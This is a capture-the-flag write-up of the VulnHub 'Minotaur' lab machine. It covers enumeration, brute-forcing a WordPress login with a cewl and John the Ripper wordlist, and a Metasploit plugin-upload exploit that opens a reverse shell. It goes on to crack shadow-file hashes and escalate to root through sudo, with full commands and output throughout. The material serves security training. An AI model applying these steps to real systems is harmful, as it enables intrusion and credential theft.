Minotaur VulnHub Writeup
- Hints
- Initial discovery
- FTP
- Apache
- Wordpress
- Custom Wordlist
- Enter John
- Metasploit
- The return of John
- heffer
- minotaur
- Conclusion
This image is brought to us by Robert Winkel, and is named Minotaur.
Hints
Reading the description for this image, we find the following two hints.
- This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
- One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
Initial discovery
Ok, moving on. I had trouble finding the machine on my host only network, but after performing an nmap scan for port 80, I came across our target. I then ran a more thoughrough scan.
$ nmap -T4 -A -v -p0-65535 192.168.56.223
Starting Nmap 6.47 ( http://nmap.org ) at 2016-04-14 13:47 EDT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 13:47
Scanning 192.168.56.223 [1 port]
Completed ARP Ping Scan at 13:47, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:47
Completed Parallel DNS resolution of 1 host. at 13:47, 0.02s elapsed
Initiating SYN Stealth Scan at 13:47
Scanning 192.168.56.223 [65536 ports]
Discovered open port 22/tcp on 192.168.56.223
Discovered open port 80/tcp on 192.168.56.223
Discovered open port 2020/tcp on 192.168.56.223
Completed SYN Stealth Scan at 13:47, 5.45s elapsed (65536 total ports)
Initiating Service scan at 13:47
Scanning 3 services on 192.168.56.223
Completed Service scan at 13:47, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.223
NSE: Script scanning 192.168.56.223.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.17s elapsed
Nmap scan report for 192.168.56.223
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
| 2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_ 256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=4/14%Time=570FD7A2%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 08:00:27:75:F8:9D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 0.001 days (since Thu Apr 14 13:45:32 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: minotaur
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.56.223
NSE: Script Post-scanning.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.77 seconds
Raw packets sent: 65559 (2.885MB) | Rcvd: 65554 (2.623MB)
So we've got an ssh server on port 22, an Apache server on port 80, and an ftp server on port 2020 with anonymous login enabled.
FTP
I login to the FTP server, however come up dry.
$ ftp
ftp> open 192.168.56.223 2020
Connected to 192.168.56.223.
220 Welcome to minotaur FTP service.
Name (192.168.56.223:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 114 4096 May 18 2015 .
drwxr-xr-x 2 0 114 4096 May 18 2015 ..
NEXT!
Apache
The root for the Apache server just returns the default page for an Ubuntu server. I shift to dirsearch to do some common name checking. I first run with the default wordlist, and then switch to an alternative wordlist.
$ python3 dirsearch.py -u192.168.56.223 -ephp -w /usr/share/dict/american-english
_|. _ _ _ _ _ _|_ v0.3.6
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 99171
Error Log: /root/dirsearch/logs/errors-16-04-14_13-49-38.log
Target: 192.168.56.223
[13:49:38] Starting:
[13:50:34] 301 - 314B - /bull -> http://192.168.56.223/bull/
Great, we've got a single hit.
Wordpress
Visiting the URL, we are presented with a rather bullish blog. I fire up wpscan in order to enumerate as much as I can.
$ wpscan --url 192.168.56.223/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.7
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.223/bull/
[+] Started: Thu Apr 14 13:52:50 2016
[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[i] This may allow the GHOST vulnerability to be exploited, please see: https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/
[+] WordPress version 4.2.2 identified from meta generator
[!] 12 vulnerabilities identified from the version number
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5622
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2221
[i] Fixed in: 4.2.7
[+] WordPress theme in use: twentyfourteen - v1.4
[+] Name: twentyfourteen - v1.4
| Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
| Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating installed plugins ...
Time: 00:00:02 <====================================================================================================> (2012 / 2012) 100.00% Time: 00:00:02
[+] We found 2 plugins:
[+] Name: akismet - v3.1.1
| Location: http://192.168.56.223/bull/wp-content/plugins/akismet/
| Readme: http://192.168.56.223/bull/wp-content/plugins/akismet/readme.txt
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
[+] Name: slideshow-gallery - v1.4.6
| Location: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
| Readme: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/readme.txt
[!] Directory listing is enabled: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
Reference: https://wpvulndb.com/vulnerabilities/7532
Reference: http://seclists.org/bugtraq/2014/Sep/1
Reference: http://packetstormsecurity.com/files/131526/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5460
Reference: http://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
Reference: http://www.exploit-db.com/exploits/34681/
Reference: http://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8263
Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4
[+] Enumerating installed themes ...
Time: 00:00:00 <======================================================================================================> (768 / 768) 100.00% Time: 00:00:00
[+] We found 1 themes:
[+] Name: twentyfourteen - v1.4
| Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
| Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating timthumb files ...
Time: 00:00:02 <====================================================================================================> (2539 / 2539) 100.00% Time: 00:00:02
[+] No timthumb files found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | bully | bully |
+----+-------+-------+
[+] Finished: Thu Apr 14 13:53:09 2016
[+] Requests Done: 5484
[+] Memory used: 8.711 MB
[+] Elapsed time: 00:00:18
So we've got a couple of out-dated plugins, one with an authenticated file upload vulnerability. In order to take advantage of this, we need the password for the bully user.
After attempting a few common passwords, I take a stab in the dark that this would be the password we need to crack.
Custom Wordlist
The hint we read previously alludes to the requirement of generating our own wordlist.
I use the cewl tool to generate a wordlist from the website content, and run this against the installation with wpscan.
$ cewl -w words.txt http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)
$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words.txt --threads 10
...snip...
[+] Starting the password brute forcer
Brute Forcing 'bully' Time: 00:00:09 <================================================================================= > (481 / 483) 99.58% ETA: 00:00:00
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | bully | | |
+----+-------+------+----------+
[+] Finished: Thu Apr 14 13:59:21 2016
[+] Requests Done: 625
[+] Memory used: 2.805 MB
[+] Elapsed time: 00:00:10
Shucks - no hits. I search for any articles on generating custom word lists with cewl, and come across this great article by NetSec.
Enter John
Following the article above, we generate a wordlist with a minimum word length of 6, and then use John the Ripper to apply its great ruleset, resulting in a list of mutated passwords.
$ cewl -w words.txt -m 6 http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)
$ john --wordlist=words.txt --rules --stdout > words-john.txt
words: 11258 time: 0:00:00:00 DONE (Thu Apr 14 14:06:33 2016) w/s: 375266 current: Receiving
Next, I fire this off to wpscan again.
$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words-john.txt --threads 10
[+] Starting the password brute forcer
Brute Forcing 'bully' Time: 00:03:20 <====================================================================== > (10316 / 11259) 91.62% ETA: 00:00:18
[SUCCESS] Login : bully Password : Bighornedbulls
+----+-------+------+----------------+
| Id | Login | Name | Password |
+----+-------+------+----------------+
| | bully | | Bighornedbulls |
+----+-------+------+----------------+
[+] Finished: Thu Apr 14 14:10:11 2016
[+] Requests Done: 10461
[+] Memory used: 3.039 MB
[+] Elapsed time: 00:03:21
Awesome - we have a valid login!
Metasploit
We already know that there's a plugin with a file upload vulnerability present, with a plugin in metasploit, so let's use the tools we have at our disposal. I fire up metasploit, and using the previously discovered login trigger the exploit.
msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD yes Valid password for the provided username
WP_USER yes A valid username
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.56.223
RHOST => 192.168.56.223
msf exploit(wp_slideshowgallery_upload) > set TARGETURI /bull/
TARGETURI => /bull/
msf exploit(wp_slideshowgallery_upload) > set WP_USER bully
WP_USER => bully
msf exploit(wp_slideshowgallery_upload) > set WP_PASSWORD Bighornedbulls
WP_PASSWORD => Bighornedbulls
msf exploit(wp_slideshowgallery_upload) > run
[*] Started reverse handler on 192.168.56.103:4444
[*] 192.168.56.223:80 - Trying to login as bully
[*] 192.168.56.223:80 - Trying to upload payload
[*] 192.168.56.223:80 - Uploading payload
[*] 192.168.56.223:80 - Calling uploaded file ieqercms.php
[*] Sending stage (32461 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.223:57315) at 2016-04-14 14:11:55 -0400
[+] Deleted ieqercms.php
Next, I open up a shell and find our first flag.
meterpreter > shell
Process 3732 created.
Channel 1 created.
cd /var/www/html
ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K May 27 2015 .
drwxr-xr-x 3 root root 4.0K May 14 2015 ..
drwxr-xr-x 5 www-data www-data 4.0K May 14 2015 bull
-rw------- 1 www-data www-data 47 May 27 2015 flag.txt
-rw-r--r-- 1 www-data www-data 12K May 14 2015 index.html
cat flag.txt
Oh, lookey here. A flag!
Th15 15 @N 3@5y f1@G!
After a little digging, I find something a little interesting.
cd /tmp
ls -lah
total 16K
drwxrwxrwt 2 root root 4.0K Apr 15 05:39 .
drwxr-xr-x 21 root root 4.0K May 14 2015 ..
-rw-r----- 1 root www-data 121 May 27 2015 flag.txt
-rw-r----- 1 root www-data 1.2K May 27 2015 shadow.bak
cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
cat shadow.bak
root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
mail:*:16484:0:99999:7:::
news:*:16484:0:99999:7:::
uucp:*:16484:0:99999:7:::
proxy:*:16484:0:99999:7:::
www-data:*:16484:0:99999:7:::
backup:*:16484:0:99999:7:::
list:*:16484:0:99999:7:::
irc:*:16484:0:99999:7:::
gnats:*:16484:0:99999:7:::
nobody:*:16484:0:99999:7:::
libuuid:!:16484:0:99999:7:::
syslog:*:16484:0:99999:7:::
mysql:!:16569:0:99999:7:::
messagebus:*:16569:0:99999:7:::
landscape:*:16569:0:99999:7:::
sshd:*:16569:0:99999:7:::
minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
ftp:*:16573:0:99999:7:::
heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
h0rnbag:$6$nlapGOqY$Hp5VHWq388mVQemkiJA2U1qLI.rZAFzxCw7ivfyglRNgZ6mx68sE1futUy..m7dYJRQRUWEpm3XKihXPB9Akd1:16582:0:99999:7:::
It looks like we're not finished with John yet..
The return of John
I retrieve the shadow.bak file and fire up John for another round.
./john --fork=8 shadow.bak
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
Warning: OpenMP was disabled due to --fork; a non-OpenMP build may be faster
Node numbers 1-8 of 8 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1 (heffer)
obiwan6 (minotaur)
We've now got what (we hope) are two more valid logins for the target.
heffer
Using my favourite Python snippet, we su to heffer and check out their home directory, as well as their sudo permissions.
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@minotaur:/tmp$ su heffer
su heffer
Password: Password1
heffer@minotaur:/tmp$ cd /home/heffer
cd /home/heffer
heffer@minotaur:~$ ls -lah
ls -lah
total 28K
drwx------ 3 heffer heffer 4.0K May 27 2015 .
drwxr-xr-x 5 root root 4.0K May 27 2015 ..
lrwxrwxrwx 1 heffer heffer 9 May 27 2015 .bash_history -> /dev/null
-rw-r--r-- 1 heffer heffer 220 May 27 2015 .bash_logout
-rw-r--r-- 1 heffer heffer 3.6K May 27 2015 .bashrc
drwx------ 2 heffer heffer 4.0K May 27 2015 .cache
-rw------- 1 heffer heffer 107 May 27 2015 flag.txt
-rw-r--r-- 1 heffer heffer 675 May 27 2015 .profile
heffer@minotaur:~$ cat flag.txt
cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0
sudo -l
Matching Defaults entries for heffer on minotaur:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User heffer may run the following commands on minotaur:
(root) NOPASSWD: /root/bullquote.sh
Curious -we are able to sudo a script named /root/bullquote.sh. Let's give it a try.
heffer@minotaur:~$ sudo /root/bullquote.sh
sudo /root/bullquote.sh
[sudo] password for heffer: Password1
sudo: /root/bullquote.sh: command not found
Damn, ok..moving on.
minotaur
I repeat the process for minotaur.
www-data@minotaur:/tmp$ su minotaur
su minotaur
Password: obiwan6
minotaur@minotaur:/tmp$ cd /home/minotaur
cd /home/minotaur
minotaur@minotaur:~$ ls -alh
ls -alh
total 36K
drwx------ 4 minotaur minotaur 4.0K May 27 2015 .
drwxr-xr-x 5 root root 4.0K May 27 2015 ..
lrwxrwxrwx 1 minotaur minotaur 9 May 27 2015 .bash_history -> /dev/null
-rw-r--r-- 1 minotaur minotaur 220 May 14 2015 .bash_logout
-rw-r--r-- 1 minotaur minotaur 3.6K May 14 2015 .bashrc
drwx------ 2 minotaur minotaur 4.0K May 14 2015 .cache
-rw------- 1 minotaur minotaur 107 May 27 2015 flag.txt
-rw-r--r-- 1 minotaur minotaur 22 May 27 2015 .gdbinit
drwxr-xr-x 4 minotaur minotaur 4.0K May 27 2015 peda
-rw-r--r-- 1 minotaur minotaur 675 May 14 2015 .profile
minotaur@minotaur:~$ cat flag.txt
cat flag.txt
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!
But can you get /root/flag.txt ?
minotaur@minotaur:~$ sudo -l
sudo -l
Matching Defaults entries for minotaur on minotaur:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User minotaur may run the following commands on minotaur:
(root) NOPASSWD: /root/bullquote.sh
(ALL : ALL) ALL
What's this - we can sudo as any user, for any command? I'll take it!
minotaur@minotaur:~$ sudo su
sudo su
[sudo] password for minotaur: obiwan6
root@minotaur:/home/minotaur# cd /root
cd /root
root@minotaur:~# ls -lah
ls -lah
total 40K
drwx------ 5 root root 4.0K May 27 2015 .
drwxr-xr-x 21 root root 4.0K May 14 2015 ..
lrwxrwxrwx 1 root root 9 May 27 2015 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
drwx------ 2 root root 4.0K May 15 2015 .cache
-rw------- 1 root root 70 May 27 2015 flag.txt
-rw------- 1 root root 22 May 27 2015 .gdbinit
drwxr-xr-x 4 root root 4.0K May 27 2015 peda
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rwx------ 1 root root 845 May 15 2015 quotes.txt
drwx------ 2 root root 4.0K May 27 2015 .ssh
root@minotaur:~# cat flag.txt
cat flag.txt
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35
Conclusion
Over all, I was surprised at the last step. We had gdb-peda installed, so every part of me expected this to include a binary challenge. All in all, a nice little challenge. I learnt a nice trick with regards to generating word lists from a pre-existing list, so that was great.
Thanks Robert Winkel for the image, and as always, thank you VulnHub for hosting it!